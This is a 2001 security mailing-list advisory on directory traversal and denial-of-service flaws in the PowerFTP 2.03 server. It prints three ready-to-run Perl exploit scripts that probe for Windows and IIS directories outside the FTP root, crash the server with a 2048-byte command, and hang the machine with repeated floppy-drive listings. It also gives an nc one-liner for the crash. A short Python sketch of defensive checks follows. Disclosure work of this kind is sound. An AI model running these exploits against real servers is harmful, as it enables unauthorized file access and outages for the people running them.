[EXPL] PowerFTP Directory Traversal and DoS Vulnerabilities

From: support@securiteam.com
To: list@securiteam.com
Subject: [EXPL] PowerFTP Directory Traversal and DoS Vulnerabilities
Message-Id: <20011130083657.33C84138BF@mail.der-keiler.de>
Date: Fri, 30 Nov 2001 09:36:57 +0100 (CET)

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com

  PowerFTP Directory Traversal and DoS Vulnerabilities
------------------------------------------------------------------------

SUMMARY

 PowerFTP (<http://www.cooolsoft.com/powerftp.htm>) is an FTP client/server
package. Three security vulnerabilities have been found in the product: one
allows access to files that reside outside the FTP root directory the server
is confined to, another crashes the product when it is sent a long buffer,
and the last one consumes all available CPU by accessing the floppy drive.

DETAILS

Vulnerable systems:
PowerFTP version 2.03

Directory Traversal:
Example:
ftp> ls ../../../../../../../
200 Port command successful.
150 Opening data connection for directory list.
SUHDLOG.DAT
COMMAND.COM
BOOTLOG.PRV
FRUNLOG.TXT
DOS
AUTOEXEC.DOS
CONFIG.DOS
VIDEOROM.BIN
CONFIG.SYS
DBLSPACE.BIN
MSDOS.SYS
MSDOS.---
SETUPLOG.TXT
WINDOWS
test.txt.txt

Exploit:
#!/usr/bin/perl
# Simple script to view files on the FTP server,
# even if they are outside of the root directory.
#
# This script assumes the server runs Windows NT/2000/9x and it looks
# for the IIS directories.
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
# Usage: perl -x PowerFTP_data.pl -s <server> [-l <user>] [-p <pass>]
#
# Examples:
#
# perl -x PowerFTP_data.pl -s 10.0.0.1 -l temp -p temp
# perl -x PowerFTP_data.pl -s 10.0.0.1
#

use Getopt::Std;
use IO::Socket;

print("\nPowerFTP server v2.03 Data revealing exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:l:p:',\%args);
my ($CRLF,$port,$login,$pass,$win,$iis,@drives,$dir,$sock_res);

$CRLF = "\015\012";
@drives = ("c","d","e"); # Remote drives to probe
# If you also need to read the A: floppy drive, use this line instead:
# @drives = ("a","c","d","e","f", ...);

$port = 21;
$login = 'temp'; # You may need to change this
$pass = 'temp';  # You may need to change this

if (defined $args{s}) { $host = $args{s}; } else
{ print "No host specified.\n";
  print "Usage: $0 -s <server> -l <user> -p <pass>\n\n";exit;
}

if (defined $args{l}) { $login = $args{l}; }
if (defined $args{p}) { $pass = $args{p}; }

$sock =
IO::Socket::INET->new(Proto=>'tcp',PeerAddr=>$host,PeerPort=>$port) ||
die("Socket errors: $!");

$sock_res = <$sock>;
print $sock "USER $login" . $CRLF;
$sock_res = <$sock>;
print $sock "PASS $pass" . $CRLF;
$sock_res = <$sock>;

if ($sock_res !~ /230\s/) { print "Login/password not accepted...exiting.\n"; close($sock); exit; }

print $sock "PWD" . $CRLF;
$sock_res = <$sock>;

print "Attempting to locate system files...";

$win = &OS;
$iis = &IIS;

print "done..\n\n"; close($sock);

print "Windows directory: $win\n";
print "IIS directory: $iis\n";
print "Try manually on FTPserver $host: dir c:/\n\n";
exit;

sub OS {
my @win_dirs = ("win","windows","winnt","winme");
    foreach $drive (@drives)
    {
      foreach $dir (@win_dirs)
      {
        print ".";
        print $sock "NLST $drive:/$dir/" . $CRLF;
        $sock_res = <$sock>;

        if ($sock_res =~ /213\s/)
         {return("$drive:\\$dir");}
      }
    }
return("not found");
}

sub IIS {
my @iis_files = ("Inetpub/wwwroot/", "Inetpub/wwwroot/cgi-bin/");
    foreach $drive (@drives)
    {
      foreach $file (@iis_files)
      {
        print ".";
        print $sock "NLST $drive:/$file" . $CRLF;
        $sock_res = <$sock>;
        if ($sock_res =~ /213\s/) {
            $file =~ s/\//\\/g;
            return("$drive:\\$file");
        }
      }
    }

return("not found");
}

Denial of Service:
Example:
# perl -e ' for ($i=1;$i<2049;$i++) { print "A";} ' | nc 10.0.0.1 21
220 Personal FTP Server ready

The server then crashes, resulting in a denial of service.

Exploit:
#!/usr/bin/perl
# Simple script to send a long string of 'A's as a command to the server,
# resulting in the ftpd crashing
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_Dos.pl -s <server>
#
# Example:
#
# perl -x PowerFTP_Dos.pl -s 10.0.0.1
# 220 Personal FTP Server ready
# Crash was successful !
#

use Getopt::Std;
use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

getopts('s:', \%args);
if(!defined($args{s})){&usage;}
$serv = $args{s};
$foo = "A"; $number = 2048;
$data .= $foo x $number; $EOL="\015\012";

$remote = IO::Socket::INET->new(
        Proto => "tcp",
        PeerAddr => $args{s},
        PeerPort => "ftp(21)",
      ) || die("Unable to connect to ftp port at $args{s}\n");

$remote->autoflush(1);
print $remote "$data". $EOL;
while (<$remote>){ print }
print("\nCrash was successful !\n");

sub usage {die("\nUsage: $0 -s <server>\n\n");}

Exploit: (DoS attack via floppy)
#!/usr/bin/perl
#
# Even though the server will deny access, the slow hardware
# will still hang the machine. This program attempts to
# exploit this weakness by sending the 'NLST a:/' command to
# the server
#
# PowerFTP Server v2.03 proof-of-concept exploit
# By Alex Hernandez <al3x.hernandez@ureach.com> (C)2001.
#
# Thanks all the people from Spain and Argentina.
# Special Greets: White-B, Pablo S0r, Paco Spain, L.Martins,
# G.Maggiotti & H.Oliveira.
#
#
# Usage: perl -x PowerFTP_floppy.pl <server> <port> <user> <pass>
#
# Example:
#
# perl -x PowerFTP_floppy.pl 10.0.0.1 21 temp temp
#

use IO::Socket;

print("\nPowerFTP server v2.03 DoS exploit Floppy (c)2001\n");
print("Alex Hernandez al3xhernandez\@ureach.com\n\n");

#$NUMBER_TO_SEND = 3000;
$BUFF = 3000;

if ( scalar @ARGV < 4 ) {
  print "Usage: $0 <server> <port> <user> <pass>\n";
  exit();
}

$target = $ARGV[ 0 ];
$port = $ARGV[ 1 ];
$username = $ARGV[ 2 ];
$password = $ARGV[ 3 ];

print "Creating socket... ";
$sock = new IO::Socket::INET( PeerAddr => $target,
                              PeerPort => int( $port ),
                              Proto    => 'tcp' );
die "$!" unless $sock;
print "done.\n";

read( $sock, $buffer, 1 );

print "Sending username...";
print $sock "USER " . $username . "\n";
read( $sock, $buffer, 1 );
print "done.\n";

print "Sending password...";
print $sock "PASS " . $password . "\n";
read( $sock, $buffer, 1 );
print "done.\n";

print "DoS Attack floppy server...";
for( $i = 0; $i < $BUFF; $i++ ) {

  print $sock "NLST a:/\n";
  read( $sock, $buffer, 1 );
}

print "done.\n";

close( $sock );
exit();
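
The three problems above come down to two missing server-side checks: a cap on the length of a control-connection command, and confinement of client-supplied paths to the FTP root (a drive letter such as c: or a: must never reach the filesystem). The following Python sketch, added here as an illustration and not taken from the advisory or from PowerFTP, shows both checks; the 512-byte limit and the C:\ftproot root are assumed values.

```python
MAX_COMMAND_LEN = 512  # assumed cap for one control-connection line (not from the advisory)


def read_command(stream: bytes, max_len: int = MAX_COMMAND_LEN):
    """Split one CRLF-terminated command off the control-connection buffer.

    Returns (command, remaining_bytes); command is None while the line is
    still incomplete. Raises ValueError as soon as the pending line exceeds
    max_len, so a 2048-byte run of 'A's is rejected before it reaches any
    fixed-size buffer or command parser.
    """
    end = stream.find(b"\r\n")
    pending = len(stream) if end < 0 else end
    if pending > max_len:
        raise ValueError(f"command line exceeds {max_len} bytes")
    if end < 0:
        return None, stream
    return stream[:end], stream[end + 2:]


def resolve_within_root(root: str, requested: str):
    """Map a client-supplied path onto the FTP root, or return None if it escapes.

    Windows path semantics are assumed (PowerFTP is a Windows server): both
    '/' and '\\' separate segments, and any segment containing ':' is refused
    because it would name a drive ('c:/windows/', 'a:/') or an alternate data
    stream rather than something under the FTP root.
    """
    parts = []
    for seg in requested.replace("\\", "/").split("/"):
        if seg in ("", "."):
            continue  # empty (leading or doubled slash) and '.' change nothing
        if ":" in seg:
            return None  # drive letter or NTFS stream: never valid inside the jail
        if seg == "..":
            if not parts:
                return None  # '..' at the root would climb out of the jail
            parts.pop()
        else:
            parts.append(seg)
    return root.rstrip("\\") + "".join("\\" + p for p in parts)


if __name__ == "__main__":
    root = "C:\\ftproot"  # constructed example root
    for req in ("pub/readme.txt", "../../../../../../../", "c:/windows/", "a:/"):
        print(f"{req!r:28} -> {resolve_within_root(root, req)}")
```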

ADDITIONAL INFORMATION

The information has been provided by <mailto:al3xhernandez@ureach.com>
al3x hernandez.
